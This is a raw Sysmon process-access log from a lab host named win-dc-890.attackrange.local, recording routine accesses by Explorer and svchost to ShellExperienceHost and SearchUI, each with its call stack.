07:45:00.658{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.658{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.636{466BC892-32D3-60E8-770B-00000000CF01}63568748C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.636{466BC892-32D3-60E8-770B-00000000CF01}63568748C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 